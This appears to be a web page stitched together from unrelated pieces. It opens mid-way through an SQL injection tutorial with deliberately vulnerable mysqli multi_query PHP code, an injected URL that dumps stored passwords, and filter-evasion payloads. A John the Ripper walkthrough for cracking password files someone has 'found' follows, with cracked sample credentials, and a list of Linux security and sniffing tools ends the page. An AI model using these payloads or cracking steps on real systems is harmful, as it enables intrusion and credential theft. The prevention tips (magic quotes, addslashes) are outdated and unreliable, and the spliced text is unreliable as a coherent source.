
The third character? And the others? Just make the same query with the right values.
Take in mind that you can also use the “greater then” (>) and “less then” (<) symbols
instead of the equal; to find the ASCII letter between a range of letters.
Eg.: between 100 and 116; and so on.
——————————————————————————-[/]

—[ Double Query ]

Sometimes in some codes happends that a programmer use the MySQLi Class (MySQL Improved
Extension) that is an extension allows you to access to the functionality provided
by MySQL 4.1 and above.

I’ll explain a very interesting bug that could be very dangerous for the
system. A not properly sanitized variable passed in the method called multi_query of
the mysqli class can be used to perform a “double” sql query injection.

mysqli_multi_query (PHP 5) is able to performs one or more queries on the
database selected. The queries executed are concatenated by a semicolon.

Look this example to know what I’m talking about:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

<?php
$mysqli = new mysqli(”localhost”, “root”, “root”, “test”);

if (mysqli_connect_errno()) {
printf(”Connect failed: %s\n”, mysqli_connect_error());
exit();
}

$query = “SELECT user FROM usr WHERE id =”. $_GET['id'].”;”;
$query .= “SELECT texts FROM news WHERE id =”. $_GET['id'];

echo ‘UserName: ‘;

if ($mysqli->multi_query($query)) {
do {
/* the first result set */
if ($result = $mysqli->store_result()) {
while ($row = $result->fetch_row()) {
echo ” – ” .$row[0]. “<br>” ;
}
$result->free();
}
/* print divider */
if ($mysqli->more_results()) {
echo “/-/-/-/-/-/-/-/-/-/-/-/-/-/<br>”;
}
} while ($mysqli->next_result());
}

/* close connection */
$mysqli->close();
?>

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

If a user request the follow URL:

http://www.victim.net/CMS/multiple.php?id=2

The browser reply with this information:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

UserName: – ad
/-/-/-/-/-/-/-/-/-/-/-/-/-/
- could be bypassed easily?

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

But the source code is bugged. The $query variable is vulnerable because
a user can supply using the GET method, an evil id and can do multiple (evil) queries.

Trying with this request:

http://localhost/apache2-default/multiple1.php?id=2; SELECT pwd FROM usr/*

We will obtain the users passwords.

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

UserName: – ad
/-/-/-/-/-/-/-/-/-/-/-/-/-/
- secret
- adpwd
- test

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/
——————————————————————————-[/]

—[  Filters Evasion ]

Web Application could implements some input filters that prevent an attacker from
exploiting certain flaws such as SQL Injection, LFI or whatever. Therefore an application
can use some mechanism that are able to sanitize, block or parse in some ways
user-supply data. This kind of filters could be bypassed by using differents methods,
here I wanna try to give to you some ideas; but certainly one filter differ from
an other one so, you have to try/find different methods to bypass it.

- Imagine that we have to bypass a login form; but the comment symbol is blocked,
we can bypass this issue but injecting this data ‘ OR ‘a’ = ‘a instead of ‘ OR 1 = 1 /*

- The filter try to prevent an SQL Injection by using this kind of Signature: ‘ or 1=1 (Case-insensitive).
An attacker can bypass this filter using ‘ OR ‘foobar’ = ‘foobar for example.

- Suppose that the application filter the keyword “admin”, to bypass this filter we have just
to use some MySQL functions such as CONCAT or CHAR for example:
union select * from usr where user = concat(’adm’,'in’)/*
union select * from usr where user=char(97,100,109,105,110)/*

This is only a little part of “filter evasion techniques”. Different filters work
differently, I can’t stay on this topic forever; I just gave to you some ideas.
——————————————————————————-[/]

—[  SQL Injection Prevention ]

How to prevent this type of attacks? Here below I just wanna write some
tips that you can use to make your web application more secure.

1.) The file php.ini located on our HD (/etc/php5/apache2/php.ini, /etc/apache2/php.ini,
and so on..) can help us with the magic quote functions. Other interesting functions can
be setted to On; take a look inside this file.

Magic quotes can be used to escape automatically with backslash the user-supply single-quote (’),
double-quote (”), backslash (\) and NULL characters.
The 3 magic quotes directives are:

- magic_quotes_gpc, that affects HTTP request data such as GET, POST and COOKIE.
- magic_quotes_runtime, if enabled, most functions that return data from an external source, will have
quotes escaped with a backslash.
- magic_quotes_sybase, that escape the ‘ with ” instead of \’.

2.) deploy mod_security for example

3.) use functions such as addslashes() htmlspecialchars(), mysql_escape_string(), etc. to validate
every user inputs.

4.) For integer input validate it by casting the variable
——————————————————————————-[/]

—[  Conclusion ]

Here we are, at the end of this paper. As said upon, I hope you enjoyed it and
for any questions please mail me.
——————————————————————————-[/]

John the Ripper is a decrypting program for passwords. Although it has many

functions we will be looking at using it as a decryper for password files
you possess.

We will be looking at Password Files which you have put on your Hard Disk
- PREPARATION
SHORTCUT TIP FOR WINDOWS 95
PASSWORD FILES
- DECRYPTING
JTR MODES
SINGLE MODE
WORDFILE MODE
INCREMENTAL MODE
ALPHA
DIGITS
ALL
SHOW MODE – Saving the Decrypted Files
- ADVANCED COMMANDS
STOPPING JTR
RULES
SESSION and RESTORE
- JTR QUICK REFERENCE

——————–

. ———–
PREPARATION
———–
1. Download the correct version of JTR, use win32 for Win 95/98
2. Extract the zip File into a Directory
3. Make sure you have your Password Files in the same directory

—————————
SHORTCUT TIP FOR WINDOWS 95
—————————
1. Right Click on the [Start] Button, and choose Open
2. Double Click on [Programs] Folder
3. Right Click and Copy, [MS-DOS Prompt]
4. Close the [Programs] Folder
5. Right Click and Paste on the Desktop, a [MS-DOS Prompt] should appear
6. Right Click on the [MS-DOS Prompt] icon and choose Properties
7. Click on the Program Tab
8. In the box next to Working (It should have C:WINDOWS in there) Change
it to the Directory of where-ever the Program JOHN.EXE has been
extracted
9. Click on the [OK] button
10. Test what you have done by Double Clicking on the Icon, If you wish to
rename [MS-DOS Prompt] to JTR, then do so

————–
PASSWORD FILES
————–
A. Naming
I personally name my files with a p extension, some people use txt
eg If i had the password file to Dannis’, I would name it danni.p
The reason is that p stands for password file, I then name my decrypted
password files with a txt extension
It is really up to you what you name your password files, just remember
that the names should be less than 8 characters
eg likethis.p
B. Where should I put them?
Always have the password files you have found in the same directory as
JOHN.EXE, Its just easier to handle them that way

———-
DECRYPTING
———-
Depending on what JTR version you have downloaded, you have to change into
the directory JOHN.EXE is

———
JTR MODES
———
There are 3 main modes we will be dealing with
-single, -wordfile, -incremental

[KEYS]
[passfile] – this is the name of your password file
[wordlist] – this is the name of your wordlist
[output] – this is the name of the file you will name when you want to
save your decrypted passwords

———–
SINGLE MODE
———–
Single Mode attempts to find the weakest of all the passwords. This is one
of the fastest methods.

SINGLE MODE SYNTAX
john -single [passfile]
or you could use
john -si [passfile]

Example:
If you found a [passfile] and named it danni.p then you would type
john -si danni.p

Take a look at SCREEN SHOT OF A JTR SESSION

————-
WORDFILE MODE
————-
Wordfile Mode is the next quickest method. It requires the use of a wordlist
The wordlist must be in a single wordlist and not a combo list

WORDFILE SYNTAX
john -wordfile:[wordlist] [passfile]
or
john -w:[wordlist] [passfile]

Example:
If you found a [passfile] and named it danni.p and you had a [wordlist]
named mydict.txt then you would type

john -w:mydict.txt danni.p

Take a look at SCREEN SHOT OF A JTR SESSION

—————-
INCREMENTAL MODE
—————-
Incremental mode is the slowest mode and will try to decrypt every pass in
your passfile, as this can take days, months even years, I would use it as
a last resort

There are 4 basic commands we will be dealing with
digits, alpha, all, and leaving it blank

DIGITS mode
This will try to decrypt all the Passwords that are in numbers

ALPHA mode
This will try to decrypt all the Passwords that are letters only

ALL mode
This will try to decrypt all the Passwords, whether they are in numbers, in
letters or some special characters (@!^&…etc)

WITH NO MODE SELECTED
This will basically do everything to try to decrypt the password file

SYNTAX
john -i [passfile]
john -i:DIGITS [passfile]
john -i:ALPHA [passfile]
john -i:ALL [passfile]

Example:
If you found a [passfile] and named it danni.p
john -i danni.p
john -i:DIGITS danni.p
john -i:ALPHA danni.p
john -i:ALL danni.p

Take a look at SCREEN SHOT OF A JTR SESSION

When running in this mode, If you ever want to stop it push CTRL – C

————————————–
SHOW MODE – Saving the Decrypted Files
————————————–
Finally, once JTR has finished its decrypting process, you will be ready
to enjoy the results. These you will save in a file name of your choice.

SHOW SYNTAX
john -show [passfile]>[output]

Example:
If you found a [passfile] and named it danni.p, you decide you want to name the
decrypted password file or [output] to danni.txt

john -show danni.p>danni.txt

Now you can open danni.txt in a TEXT EDITOR
You will see something like this

italia:italiano
makoto:makotox
PADWICK:PADWICKH
kelley:kelleyaj
bechtel:jbechtel
mequery:queryme
seeeee:meeeee
stevewm:stevenm

8 passwords cracked, 246 left

Hopefully you will get more passwords than the example though

—————–
ADVANCED COMMANDS
—————–
Here are a few more commands which prove handy when using JTR

————
STOPPING JTR
————
If at anytime you wish to stop the decrypting process then
Hold down the [ CTRL ] key and Push the [ C ] key

—–
RULES
—–
This command is used with the Wordfile Option, without it JTR will try only
the words in your wordlist. When this is activated it will try variations as
outlined in the john.ini file. This is also quite slow

RULES SYNTAX
john w:[wordlist] -rules [passfile]

——————
SESSION & RESTORE
——————
Decrypting by now you will notice can become a long a slow process, JTR
allows you to save save and restore sessions. A session is like a snap
shot of what you are decrypting. It remembers what file you used, and
where you were at if you decide to stop it. session can be used with any
of the main modes.

SESSION & RESTORE SYNTAX
john -restore
john -restore:[session name]
john -session:[session name]

[session name] is any name you choose

EXAMPLE
——-
Lets say you want to decrypt a file named danni.p

OK you’ve used the -si mode, which was quick
With your trusty wordlist file named biglist.txt you next run the -w mode

FINAL NOTES
———–
There are many other features that JTR uses, that are Advanced, these can be
found in the DOC folder in JTR, just use a text editor to open and read them
We were only concerned with getting at least 50% of the passwords. This may
be achieved by SINGLE and WORDFILE modes
SPEED is dependant on your CPU, If you screen looks like its frozen and
doing nothing, just hit any key a couple of times, you will see a mini
progress report.
Speed is also dependant on the size of your password file and the number of
salts, A salt can be thought of as a slightly different way to encrypt a
file. As there are many ways to encrypt a single password

——————-
JTR QUICK REFERENCE
——————-
[KEYS]
[passfile] – this is the name of your password file
[wordlist] – this is the name of your wordlist
[output] – this is the name of the file you will name when you want to
save your decrypted passwords
: – whenever you see a colon then use it in the command
- – whenever you see a minus sign then use it in the command
> – whenever you see this sign then use it in the command
[] – DO NOT INCLUDE THESE IN THE COMMAND

SINGLE MODE
john -si [passfile]
WORDFILE MODE
john -w:[wordlist] [passfile]
INCREMENTAL MODES
john -i [passfile]
john -i:ALL [passfile]
john -i:DIGITS [passfile]
john -i:ALPHA [passfile]
SHOW MODES
john -show [passfile]>[output]

Loaded 254 passwords with 85 different salts (Standard DES [32/32 BS])
italia (italiano)
makoto (makotox)
PADWICK (PADWICKH)
kelley (kelleyaj)
bechtel (jbechtel)
mequery (queryme)
seeeee (meeeee)
stevewm (stevenm)
guesses: 8 time: 0:00:01:23 100% c/s: 25771 trying: zcatcatk – zcatcatz

Below is list of Linux Security Tools that you must know about as being Linux Administrator.

1) Wireshark – network traffic analyzer
Wireshark is a network traffic analyzer, or “sniffer”, for Unix and Unix-like operating systems. A sniffer is a tool used to capture packets off the wire. Wireshark decodes numerous protocols (too many to list).This package provides wireshark (the GTK+ version)

http://www.wireshark.org

2) Nessus – Remote network security auditor
The Nessus® vulnerability scanner, is the world-leader in active scanners, featuring high speed discovery, configuration auditing, asset profiling, sensitive data discovery and vulnerability analysis of your security posture. Nessus scanners can be distributed throughout an entire enterprise, inside DMZs, and across physically separate networks.

http://www.nessus.org

3) Nmap – The Network Mapper
Nmap (”Network Mapper”) is a free and open source (license) utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and both console and graphical versions are available.

4) Etherape – graphical network monitor modeled after etherman
EtherApe is a graphical network monitor for Unix modeled after etherman. Featuring link layer, ip and TCP modes, it displays network activity graphically. Hosts and links change in size with traffic. Color coded protocols display.It supports Ethernet, FDDI, Token Ring, ISDN, PPP and SLIP devices. It can filter traffic to be shown, and can read traffic from a file as well as live from the network.

http://etherape.sourceforge.net

5) Kismet – Wireless 802.11b monitoring tool
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.
Kismet identifies networks by passively collecting packets and detecting standard named networks, detecting (and given time, decloaking) hidden networks, and infering the presence of nonbeaconing networks via data traffic.

http://www.kismetwireless.net

6) Chkrootkit – Checks for signs of rootkits on the local system
chkrootkit identifies whether the target computer is infected with a rootkit. Some of the rootkits that chkrootkit identifies are:
1. lrk3, lrk4, lrk5, lrk6 (and some variants);
2. Solaris rootkit;
3. FreeBSD rootkit;
4. t0rn (including latest variant);
5. Ambient’s Rootkit for Linux (ARK);
6. Ramen Worm;
7. rh[67]-shaper;
8. RSHA;
9. Romanian rootkit;
10. RK17;
11. Lion Worm;
12. Adore Worm.
Please note that this is not a definitive test, it does not ensure that the target has not been cracked. In addition to running chkrootkit, one should perform more specific tests.

http://www.chkrootkit.org

7) Rkhunter – rootkit, backdoor, sniffer and exploit scanner
Rootkit Hunter scans systems for known and unknown rootkits, backdoors, sniffers and exploits.
It checks for:
- MD5 hash changes;
- files commonly created by rootkits;
- executables with anomalous file permissions;
- suspicious strings in kernel modules;
- hidden files in system directories;
and can optionally scan within files. Using rkhunter alone does not guarantee that a system is not compromised. Running additional tests, such as chkrootkit, is recommended.

http://www.rootkit.nl

8 ) tiger – Report system security vulnerabilities
TIGER, or the ‘tiger’ scripts, is a set of Bourne shell scripts, C programs and data files which are used to perform a security audit of UNIX systems. TIGER has one primary goal: report ways ‘root’ can be compromised.Debian’s TIGER incorporates new checks primarily oriented towards Debian distribution including: md5sums checks of installed files, location of files not belonging to packages, check of security advisories and analysis of local listening processes.

9) GnuPG – GNU privacy guard
GnuPG is GNU’s tool for secure communication and data storage. It can be used to encrypt data and to create digital signatures. It includes an advanced key management facility and is compliant with the proposed OpenPGP Internet standard as described in RFC2440.GnuPG does not use any patented algorithms so it cannot be compatible with PGP2 because it uses IDEA (which is patented worldwide).

http://www.gnupg.org/

10) Nemesis – TCP/IP Packet Injection Suite
Nemesis is a command-line network packet crafting and injection utility for UNIX-like and Windows systems. Nemesis, is well suited for testing Network Intrusion Detection Systems, firewalls, IP stacks and a variety of other tasks. As a command-line driven utility, Nemesis is perfect for automation and scripting.
Nemesis can natively craft and inject ARP, DNS, ETHERNET, ICMP, IGMP, IP, OSPF, RIP, TCP and UDP packets. Using the IP and the Ethernet injection modes, almost any custom packet can be crafted and injected.

http://nemesis.sourceforge.net

11) Tcpdump – A powerful tool for network monitoring and data acquisition
This program allows you to dump the traffic on a network. tcpdump is able to examine IPv4, ICMPv4, IPv6, ICMPv6, UDP, TCP, SNMP, AFS BGP, RIP, PIM, DVMRP, IGMP, SMB, OSPF, NFS and many other packet types.
It can be used to print out the headers of packets on a network interface, filter packets that match a certain expression. You can use this tool to track down network problems, to detect “ping attacks” or to monitor network activities.

http://www.tcpdump.org/

12) OpenSSH – secure shell server
This is the portable version of OpenSSH, a free implementation of the Secure Shell protocol as specified by the IETF secsh working group.Ssh (Secure Shell) is a program for logging into a remote machine and for executing commands on a remote machine. It provides secure encrypted communications between two untrusted hosts over an insecure network. X11 connections and arbitrary TCP/IP ports can also be forwarded over the secure channel. It is intended as a replacement for rlogin, rsh and rcp, and can be used to provide applications with a secure communication channel.This package provides the sshd server.
In some countries it may be illegal to use any encryption at all without a special permit.

http://www.openssh.com/

13) Denyhosts – an utility to help sys admins thwart ssh hackers
DenyHosts is a program that automatically blocks ssh brute-force attacks by adding entries to /etc/hosts.deny. It will also inform Linux administrators about offending hosts, attacked users and suspicious logins.Syncronization with a central server is possible too.
Differently from other software that do same work, denyhosts doesn’t need support for packet filtering or any other kind of firewall in your kernel

http://denyhosts.sourceforge.net/

14) Snort – Flexible Network Intrusion Detection System

Snort is a libpcap-based packet sniffer/logger which can be used as a lightweight network intrusion detection system. It features rules based logging and can perform content searching/matching in addition to being used to detect a variety of other attacks and probes, such as buffer overflows, stealth port scans, CGI attacks, SMB probes, and much more. Snort has a real-time alerting capability, with alerts being sent to syslog, a separate “alert” file, or even to a Windows computer via Samba.
This package provides the plain-vanilla snort distribution and does not provide database (available in snort-pgsql and snort-mysql) support.

http://www.snort.org/

15) Firestarter – gtk program for managing and observing your firewall
Firestarter is a complete firewall tool for Linux machines. It features an easy to use firewall wizard to quickly create a firewall. Using the program you can then open and close ports with a few clicks, or stealth your machine giving access only to a select few. The real-time hit monitor shows attackers probing your machine.

http://www.fs-security.com

16) clamav – anti-virus utility for Unix – command-line interface
Clam AntiVirus is an anti-virus toolkit for Unix. The main purpose of this software is the integration with mail servers (attachment scanning). The package provides a flexible and scalable multi-threaded daemon in the clamav-daemon package, a command-line scanner in the clamav package, and a tool for automatic updating via the Internet in the clamav-freshclam package. The programs are based on libclamav3, which can be used by other software.
This package contains the command line interface. Features:
- built-in support for various archive formats, including Zip, RAR, Tar,
Gzip, Bzip2, OLE2, Cabinet, CHM, BinHex, SIS and others;
- built-in support for almost all mail file formats;
- built-in support for ELF executables and Portable Executable files
compressed with UPX, FSG, Petite, NsPack, wwpack32, MEW, Upack and
obfuscated with SUE, Y0da Cryptor and others;
- built-in support for popular document formats including Microsoft
Office and Mac Office files, HTML, RTF and PDF.
For scanning to work, a virus database is needed. There are two options for getting it:
- clamav-freshclam: updates the database from Internet. This is
recommended with Internet access.
- clamav-data: for users without Internet access. The package is
not updated once installed. The clamav-getfiles package allows
creating custom packages from an Internet-connected computer.

http://www.clamav.net/

17) Ettercap – Multipurpose sniffer/interceptor/logger for switched LAN
Ettercap supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis.Data injection in an established connection and filtering (substitute or drop a packet) on the fly is also possible, keeping the connection synchronized.
Many sniffing modes were implemented to give you a powerful and complete sniffing suite. It’s possible to sniff in four modes: IP Based, MAC Based, ARP Based (full-duplex) and PublicARP Based (half-duplex).
It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN.

http://ettercap.sourceforge.net/

18) Netcat – TCP/IP swiss army knife
A simple Unix utility which reads and writes data across network connections using TCP or UDP protocol. It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

http://netcat.sourceforge.net

19) MTR – mtr combines the functionality of the ‘traceroute’ and ‘ping’ programs in a single network diagnostic tool.
As mtr starts, it investigates the network connection between the host mtr runs on and a user-specified destination host. After it determines the address of each network hop between the machines, it sends a sequence ICMP ECHO requests to each one to determine the quality of the link to each machine. As it does this, it prints running statistics about each machine.

http://www.bitwizard.nl/mtr/
20) Hping3 – Active Network Smashing Tool
hping3 is a network tool able to send custom ICMP/UDP/TCP packets and to display target replies like ping does with ICMP replies. It handles fragmentation and arbitrary packet body and size, and can be used to transfer files under supported protocols. Using hping3, you can test firewall rules, perform (spoofed) port scanning, test network performance using different protocols, do path MTU discovery, perform traceroute-like actions under different protocols, fingerprint remote operating systems, audit TCP/IP stacks, etc. hping3 is scriptable using the TCL language.

http://www.hping.org

21) ngrep – grep for network traffic
ngrep strives to provide most of GNU grep’s common features, applying them to the network layer. ngrep is a pcap-aware tool that will allow you to specify extended regular expressions to match against data payloads of packets. It currently recognizes TCP, UDP and ICMP across Ethernet, PPP, SLIP and null interfaces, and understands bpf filter logic in the same fashion as more common packet sniffing tools, such as tcpdump and snoop.

http://ngrep.sourceforge.net/

22) john – active password cracking tool
john, mostly known as John the Ripper, is a tool designed to help systems administrators to find weak (easy to guess or crack through brute force) passwords, and even automatically mail users warning them about it, if it is desired.
It can also be used with different cyphertext formats, including Unix’s DES and MD5, Kerberos AFS passwords, Windows’ LM hashes, BSDI’s extended DES, and OpenBSD’s Blowfish.

http://www.openwall.com/john/

23) tcptrace – Tool for analyzing tcpdump output
Tcptrace is a tool for analyzing and reporting on tcpdump (or other libpcap) dump files. It can summarize the data or generate graph data for use with the gnuplot tool from the gnuplot package. Graph data can be created for throughput, RTT, time sequences, segment size, and cwin.
http://jarok.cs.ohiou.edu/software/tcptrace/

24) netdude – NETwork DUmp data Displayer and Editor for tcpdump trace files
It is a GUI-based tool that allows you to make detailed changes to packets in tcpdump trace files, in particular, it can currently do the following:
* Set the value of any field in IP, TCP and UDP packet headers.
* Copy, move and delete packets in the trace file.
* Fragment and reassemble IP packets.
* Netdude constantly communicates with a tcpdump process to update
the familiar tcpdump output that corresponds to the trace. This
also means that any changes made to your local version of tcpdump
are reflected in Netdude.
* Plugin architecture: people can easily add plugins for specific
tasks. The code comes with a plugin for checksum correction in IP,
TCP and UDP, and a dummy plugin.
* Through the plugin mechanism, Netdude provides a good facility for
writing tcpdump trace file filters.
http://netdude.sourceforge.net
25) tcpreplay – Tool to replay saved tcpdump files at arbitrary speeds

Tcpreplay is aimed at testing the performance of a NIDS by replaying real background network traffic in which to hide attacks. Tcpreplay allows you to control the speed at which the traffic is replayed, and can replay arbitrary tcpdump traces. Unlike programmatically-generated artificial traffic which doesn’t exercise the application/protocol inspection that a NIDS performs, and doesn’t reproduce the real-world anomalies that appear on production networks (asymmetric routes, traffic bursts/lulls, fragmentation, retransmissions, etc.), tcpreplay allows for exact replication of real traffic seen on real networks.
http://tcpreplay.synfin.net
26) Dsniff – Various tools to sniff network traffic for cleartext insecurities
This package contains several tools to listen to and create network traffic:
* arpspoof – Send out unrequested (and possibly forged) arp replies.
* dnsspoof – forge replies to arbitrary DNS address / pointer queries
on the Local Area Network.
* dsniff – password sniffer for several protocols.
* filesnarf – saves selected files sniffed from NFS traffic.
* macof – flood the local network with random MAC addresses.
* mailsnarf – sniffs mail on the LAN and stores it in mbox format.
* msgsnarf – record selected messages from different Instant Messengers.
* sshmitm – SSH monkey-in-the-middle. proxies and sniffs SSH traffic.
* sshow – SSH traffic analyser.
* tcpkill – kills specified in-progress TCP connections.
* tcpnice – slow down specified TCP connections via “active”
traffic shaping.
* urlsnarf – output selected URLs sniffed from HTTP traffic in CLF.
* webmitm – HTTP / HTTPS monkey-in-the-middle. transparently proxies.
* webspy – sends URLs sniffed from a client to your local browser
(requires libx11-6 installed).

http://www.monkey.org/~dugsong/dsniff/
27) scapy – Packet generator/sniffer and network scanner/discovery
Scapy is a powerful interactive packet manipulation tool, packet generator, network scanner, network discovery, packet sniffer, etc. It can for the moment replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, ….
In scapy you define a set of packets, then it sends them, receives answers, matches requests with answers and returns a list of packet couples (request, answer) and a list of unmatched packets. This has the big advantage over tools like nmap or hping that an answer is not reduced to (open/closed/filtered), but is the whole packet.
http://www.secdev.org/projects/scapy/
28) Ntop – display network usage in top-like format
ntop is a Network Top program. It displays a summary of network usage by machines on your network in a format reminiscent of the unix top utility.It can also be run in web mode, which allows the display to be browsed with a web browser.
http://www.ntop.org/
29) NBTscan – A program for scanning networks for NetBIOS name information
NBTscan is a program for scanning IP networks for NetBIOS name information. It sends NetBIOS status query to each address in supplied range and lists received information in human readable form. For each responded host it lists IP address, NetBIOS computer name, logged-in user name and MAC address (such as Ethernet).

http://www.unixwiz.net/tools/nbtscan.html
30) tripwire – file and directory integrity checker
Tripwire is a tool that aids system administrators and users in monitoring a designated set of files for any changes. Used with system files on a regular (e.g., daily) basis, Tripwire can notify system administrators of corrupted or tampered files, so damage control measures can be taken in a timely manner.
http://www.tripwire.com/